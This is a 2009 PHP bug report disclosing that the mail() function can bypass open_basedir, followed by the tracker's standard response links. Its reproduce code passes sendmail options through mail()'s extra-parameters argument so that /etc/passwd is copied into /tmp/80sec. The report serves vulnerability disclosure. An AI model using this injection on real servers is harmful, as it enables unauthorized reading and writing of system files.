#48229 [NEW]: php mail function open_basedir bypass

Sun, 10 May 2009 19:36:01 -0700 

From:             root at 80sec dot com
Operating system: linux
PHP version:      5.2.9
PHP Bug Type:     Safe Mode/open_basedir
Bug description:  php mail function open_basedir bypass

Description:
------------
The mail function may bypass open_basedir or read/write arbitrary
 file.

Reproduce code:
---------------
<?php
$to = 'jian...@80sec.com'.str_repeat("x",10000);
$subject = 'the subject'.str_repeat("x",10);
$message = 'hello'.str_repeat("x",10);
mail($to, $subject, $message, $headers,"-v -bt -X /tmp/80sec -d13 -C
/etc/passwd");
?>

Expected result:
----------------
we can get the contents of /etc/passwd in /tmp/80sec.

Actual result:
--------------
we can get the contents of /etc/passwd in /tmp/80sec.

-- 
Edit bug report at http://bugs.php.net/?id=48229&edit=1
-- 
Try a CVS snapshot (PHP 5.2):        
http://bugs.php.net/fix.php?id=48229&r=trysnapshot52
Try a CVS snapshot (PHP 5.3):        
http://bugs.php.net/fix.php?id=48229&r=trysnapshot53
Try a CVS snapshot (PHP 6.0):        
http://bugs.php.net/fix.php?id=48229&r=trysnapshot60
Fixed in CVS:                        
http://bugs.php.net/fix.php?id=48229&r=fixedcvs
Fixed in CVS and need be documented: 
http://bugs.php.net/fix.php?id=48229&r=needdocs
Fixed in release:                    
http://bugs.php.net/fix.php?id=48229&r=alreadyfixed
Need backtrace:                      
http://bugs.php.net/fix.php?id=48229&r=needtrace
Need Reproduce Script:               
http://bugs.php.net/fix.php?id=48229&r=needscript
Try newer version:                   
http://bugs.php.net/fix.php?id=48229&r=oldversion
Not developer issue:                 
http://bugs.php.net/fix.php?id=48229&r=support
Expected behavior:                   
http://bugs.php.net/fix.php?id=48229&r=notwrong
Not enough info:                     
http://bugs.php.net/fix.php?id=48229&r=notenoughinfo
Submitted twice:                     
http://bugs.php.net/fix.php?id=48229&r=submittedtwice
register_globals:                    
http://bugs.php.net/fix.php?id=48229&r=globals
PHP 4 support discontinued:          http://bugs.php.net/fix.php?id=48229&r=php4
Daylight Savings:                    http://bugs.php.net/fix.php?id=48229&r=dst
IIS Stability:                       
http://bugs.php.net/fix.php?id=48229&r=isapi
Install GNU Sed:                     
http://bugs.php.net/fix.php?id=48229&r=gnused
Floating point limitations:          
http://bugs.php.net/fix.php?id=48229&r=float
No Zend Extensions:                  
http://bugs.php.net/fix.php?id=48229&r=nozend
MySQL Configuration Error:           
http://bugs.php.net/fix.php?id=48229&r=mysqlcfg

Reply via email to